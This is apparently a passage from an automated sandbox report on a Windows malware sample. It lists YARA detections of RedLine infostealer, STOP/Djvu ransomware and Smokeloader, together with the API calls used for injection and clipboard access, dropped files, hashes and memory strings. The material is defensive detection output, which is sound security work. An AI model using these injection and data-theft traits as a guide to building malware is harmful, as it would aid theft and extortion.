Code function: 6_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DCE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C2AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BD69
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C7F1
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00411470
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004010E0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00406150
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040D600
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00402830
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00421F48
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040DCE1
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040BD69
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040CEE9
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040C2AD
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00404BDB
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040C7F1
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00406793

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\43D0.exe F55976607594D241004245F084ADD64F399F7D4683C603F56EF92C0CBCD41E05

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.43D0.exe.49815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.43D0.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 1332, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 43D0.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: String function: 00413FF0 appears 54 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,

Source: C4AA.exe.3.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\beirutt

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@17/6@3/3

Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
